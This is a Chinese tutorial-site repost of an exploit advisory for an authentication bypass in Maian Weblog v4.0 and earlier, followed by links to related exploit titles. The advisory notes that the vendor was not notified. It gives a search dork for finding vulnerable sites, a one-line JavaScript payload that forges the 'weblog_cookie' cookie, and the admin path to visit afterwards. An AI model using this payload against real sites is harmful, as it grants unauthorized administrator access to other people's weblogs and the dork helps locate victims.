手机
当前位置:查字典教程网 >网络安全 >Exploit >Maian Weblog
Maian Weblog
摘要:-[*]==================================================================...

-[*] ================================================================================ [*]-

-[*] Maian Weblog <= v4.0 Insecure Cookie Handling Vulnerability [*]-

-[*] ================================================================================ [*]-

[*] Discovered By: S.W.A.T.

[*] E-Mail: svvateam[at]yahoo[dot]com

[*] Script Download: http://www.maianscriptworld.co.uk

[*] DORK: Powered by Maian Weblog v4.0

[*] Vendor Has Not Been Notified!

[*] DESCRIPTION:

Maian Weblog suffers from a insecure cookie, the admin panel only checks if the cookie

exists.

and not the content. so we can easyily craft a cookie and look like a admin.

[*] Vulnerability:

javascript:document.cookie = "weblog_cookie=1; path=/";

[*] NOTE/TIP:

after running the javascript, visit "/admin/index.php" to view admin area.

-[*] ================================================================================ [*]-

-[*] Maian Weblog <= v4.0 Insecure Cookie Handling Vulnerability [*]-

-[*] ================================================================================ [*]-

【Maian Weblog】相关文章:

Rianxosencabos CMS 0.9 Remote Add Admin Exploit

Trend Micro OfficeScan ObjRemoveCtrl ActiveX Control BOF Exploit

Safari Quicktime

pLink 2.07 (linkto.php id) Remote Blind SQL Injection Exploit

MFORUM 0.1a Arbitrary Add-Admin Vulnerability

Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit

GeekLog

MS Windows (.doc File) Malformed Pointers Denial of Service Exploit

Document Imaging SDK 10.95 ActiveX Buffer Overflow PoC

Boonex Dolphin 6.1.2 Multiple Remote File Inclusion Vulnerabilities

上一篇: Maian Search
精品推荐
分类导航